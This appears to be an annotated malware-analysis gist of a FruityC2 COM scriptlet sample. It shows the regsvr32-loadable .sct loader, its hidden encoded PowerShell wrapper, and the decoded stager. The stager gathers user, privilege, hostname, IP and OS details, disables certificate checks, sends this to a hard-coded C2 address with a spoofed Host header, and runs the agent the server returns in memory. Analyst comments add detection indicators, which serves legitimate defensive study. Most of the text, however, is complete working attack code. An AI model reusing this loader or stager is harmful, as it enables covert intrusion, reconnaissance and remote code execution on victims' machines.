FruityC2 Scriptlet 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9
## uploaded by @JohnLaTwC
## Sample hash: 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9
<?XML version="1.0"?>
<!-- Analyst notes added for review; the sample's own content is unchanged. -->
<!-- COM scriptlet (.sct). Code placed inside <registration> runs when the scriptlet is registered/loaded,
     e.g. when the file or URL is handed to regsvr32 with scrobj.dll (ATT&CK T1218.010). The loader actually
     used for this sample is not recorded in the gist. -->
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- progid and classid are hard-coded constants carried over from the PoC; they are a cheap static
     indicator to hunt on in files and in registry/COM telemetry. -->
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
// Stage 0: spawn a hidden PowerShell. -nop = no profile, -w hidden = no window,
// -e = -EncodedCommand (base64 of a UTF-16LE script); the decoded command is shown further down this gist.
// Detection: a script/registration host (regsvr32, mshta, wscript, ...) as parent of powershell.exe with
// "-w hidden" and "-e" on the command line.
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e 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");
]]>
</script>
</registration>
</scriptlet>
## decodes to (the -e / -EncodedCommand argument, base64-decoded):
// Stage 1 (the -e payload, decoded): base64 -> raw DEFLATE (DeflateStream, no zlib/gzip header) -> Invoke-Expression.
// This stage itself touches no files: the script is inflated into a MemoryStream and executed with IEX.
// The inflated script (stage 2) is shown below.
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e $data = "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";$data = [System.Convert]::FromBase64String($data);$ms = New-Object System.IO.MemoryStream;$ms.Write($data, 0, $data.Length);$ms.Seek(0,0) | Out-Null;$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress));IEX $sr.ReadToEnd();");
## decodes to (base64 -> raw DEFLATE, the same steps stage 1 performs before IEX):
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e $data = "function Invoke-Stager {
# Stage 2 (inflated from stage 1): FruityC2 stager. Gathers host facts, checks in to the C2 over HTTP(S)
# with the facts packed into a cookie, and IEXes the agent script the server returns.
# Analyst comments added for review; the sample's code is unchanged.
# Parameters: r_server / r_port / r_ssl build the C2 URL ("s" => https); UA = HTTP User-Agent;
# SID = name of the cookie that carries the recon blob; pg_header = extra headers as "Name value|Name value".
param (
$r_server = "",
$r_port = "",
$r_ssl = "",
$UA = "FruityC2",
$SID = "SESSIONID",
$pg_header = ""
)
# Disables TLS certificate validation for the whole process (a self-signed C2 certificate is accepted, and the
# channel is trivially interceptable by anyone on path). Pins the protocol to SecurityProtocolType::Tls, i.e. TLS 1.0.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls;
# Channel options: only compression is on. encrypt/decrypt are referenced by tx_data/rx_data below but are not
# defined anywhere in this stage, so $o_encryption = $true would fail here; confidentiality rests on TLS alone.
[bool]$o_base64 = $false
[bool]$o_encryption = $false
[bool]$o_compression = $true
# Agent id = Unix epoch seconds at start-up (parsed as a double, truncated to int): predictable, not random.
$UUID = [int][double]::Parse((Get-Date -UFormat %s))
# --- host recon; $s is reused as a scratch variable throughout ---
$s = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
$USER = $s.Trim()
# Integrity label reported to the C2: '4' = running as SYSTEM, '3' = token holds the Administrators role
# (effectively elevated under UAC), '2' = anything else.
if(([Environment]::UserName).ToLower() -eq "system"){$s='4'}
elseif(([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") -eq $true){$s='3'} # 3=High
else {$s='2'}
$LABEL = $s
# Hostname, OS name and architecture via three separate WMI Win32_OperatingSystem queries; the IPv4 address
# by pinging the machine's own name with Test-Connection. A self-ping from powershell.exe is an unusual host signal.
$s = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
$NAME = $s.Trim()
$s = (Test-Connection $env:COMPUTERNAME -count 1 | select Ipv4Address) | FT -HideTableHeaders | Out-String
$IP = $s.Trim()
$s = (Get-WmiObject Win32_OperatingSystem).Name.split('|')[0] | Out-String
$VERSION = $s.Trim()
$s = (Get-WmiObject Win32_OperatingSystem).OSArchitecture | Out-String
$s = $s.Trim()
$OS_ARCH = $s
# HTTP GET of http{s}://<r_server>:<r_port><path>. Returns the response body as a string; on a WebException
# (the only type caught) it prints "Get-Data ERROR." and returns nothing. $UA, $SID, $TARGET, $pg_header and
# $r_* are read from the enclosing scope (PowerShell dynamic scoping). The default for -path refers to a
# script-scope $path_get that this stage never sets; the one caller below passes -path explicitly.
# Network indicators: fixed User-Agent; cookie "<SID>=<deflate+base64url recon blob>"; the extra headers from
# pg_header (e.g. a Host value that does not match the real destination). The request goes through the system
# proxy with the logged-on user's default credentials, so it traverses authenticated corporate proxies.
function Get-Data {
param($path = $script:path_get)
try{
$wc = new-object system.net.WebClient
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$wc.Headers.Add("User-Agent",$UA)
$wc.Headers.Add("Cookie", "$SID=$TARGET;")
if ($pg_header -ne "") {
$hs = $pg_header.split("|")
foreach ($h in $hs) {
# Split on every space; only $i[0] (name) and $i[1] (value) are used, so a value containing spaces is truncated
# to its first word.
$i = $h.split(" ")
# Host is skipped on PowerShell 2, presumably because the older WebClient rejects setting that restricted
# header (not verifiable from this sample).
if ($PSVersionTable.PSVersion.Major -eq 2 -And $i[0] -Eq "Host" ) {
} else {
$wc.Headers.Add($i[0], $i[1])
}
}
}
$request = "http$($r_ssl)://$($r_server):$($r_port)$($path)"
$data = $wc.DownloadString($request)
return $data
}
catch [Net.WebException] {
Write-Host "Get-Data ERROR."
}
}
# Wire encoding for everything this stage sends or receives: raw DEFLATE (no zlib/gzip header), then base64 with
# the URL-safe substitutions "+" -> "-" and "/" -> "_" ("=" padding is kept). Worth a signature: cookie values
# and response bodies look like base64 but contain "-" and "_".
function deflate($data) {
$s = $data
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($s)
# Closing the writer disposes the DeflateStream, which flushes the final compressed block into $ms.
$sw.Close();
$s = [System.Convert]::ToBase64String($ms.ToArray())
$s = $s.replace("+","-") # BASE64 URLSAFE
$s = $s.replace("/","_") # BASE64 URLSAFE
return $s
}
# Inverse of deflate: undo the URL-safe substitutions, base64-decode, inflate. Applied to every C2 response.
# A $null input (e.g. Get-Data failed) is not handled; the .replace call would error.
function inflate($data) {
$data = $data.replace("-","+") # BASE64 URLSAFE
$data = $data.replace("_","/") # BASE64 URLSAFE
$data = [System.Convert]::FromBase64String($data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
return $sr.ReadToEnd()
}
# Receive path: inflate, then decrypt if enabled. Transmit path: encrypt if enabled, then deflate.
# Note the order: compression would run over ciphertext if encryption were ever switched on.
# decrypt/encrypt are not defined in this stage (see $o_encryption above).
Function rx_data($data) {
if ($o_compression -eq $true) { $data = inflate($data) }
if ($o_encryption -eq $true) { $data = decrypt($data) }
return $data
}
Function tx_data($data) {
if ($o_encryption -eq $true) { $data = encrypt($data) }
if ($o_compression -eq $true) { $data = deflate($data) }
return $data
}
# First check-in. GET /<30 random ASCII letters> (Get-Random -Count draws without replacement, so no letter
# repeats within the path) with the recon blob in the cookie. After inflate, the response is eight
# "|"-separated fields: sleep seconds | jitter | new User-Agent | GET path | POST path | post id | session id |
# base64 agent script. The agent is decoded and executed in memory with IEX; Invoke-FruityC2 is defined by that
# agent, not in this sample. The Write-Host output goes to a hidden window, but the IEX'd script is visible to
# PowerShell script-block logging where it is enabled.
function stager($TARGET) {
$path_stager = -join ((65..90) + (97..122) | Get-Random -Count 30 | % {[char]$_})
$data = Get-Data -path "/$path_stager"
Write-Host "STAGER: $data"
[String]$data = rx_data($data)
# [Array[]] is an odd cast for the result of a string split; it leans on PowerShell's permissive conversions.
# NOTE(review): confirm what $temp[n] holds on the PowerShell versions this targets.
[Array[]]$temp = $data.split("|")
$stime = [convert]::ToInt32($temp[0],10)
$jitter = [convert]::ToInt32($temp[1],10)
$UA = $temp[2]
$path_get = $temp[3]
$path_post = $temp[4]
$post_id = $temp[5]
$session_id = $temp[6]
$agent = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($temp[7]))
Write-Host $agent
IEX $($agent)
Invoke-FruityC2 -path_get $path_get -path_post $path_post -jitter $jitter -stime $stime -UA $UA -stager $false -r_server $r_server -r_port $r_port -target $TARGET -post_id $post_id -session_id $session_id -r_ssl $r_ssl -pg_header $pg_header
}
# Check-in payload "<epoch>|<os>|<user>|<label>|<host>|<ip>|<arch>|normal", deflated + base64url, sent as the
# cookie value: the very first request leaks username, hostname, IP and OS version in a reversible encoding.
$TARGET = tx_data("$UUID|$VERSION|$USER|$LABEL|$NAME|$IP|$OS_ARCH|normal")
stager($TARGET)
}
# Entry point as captured: C2 at 159.89.106.106:8080 over HTTPS (r_ssl "s"), an IE11-on-Windows-7-style
# User-Agent, and the extra headers "Accept: */*" and "Host: www.amazon.com". The Host value does not match the
# real destination (a bare IP), a Host/destination mismatch that proxies and network monitoring can flag.
# `clear` only clears a console nobody sees (-w hidden). Treat the IP as a historical indicator from this
# sample, not as evidence of current activity. The trailing `";$data = ... IEX $sr.ReadToEnd();");` is the end of
# the stage-1 wrapper that inflated and executed this script.
clear
Invoke-Stager -r_server "159.89.106.106" -r_port "8080" -UA "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" -r_ssl "s" -pg_header "Accept */*|Host www.amazon.com"";$data = [System.Convert]::FromBase64String($data);$ms = New-Object System.IO.MemoryStream;$ms.Write($data, 0, $data.Length);$ms.Seek(0,0) | Out-Null;$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress));IEX $sr.ReadToEnd();");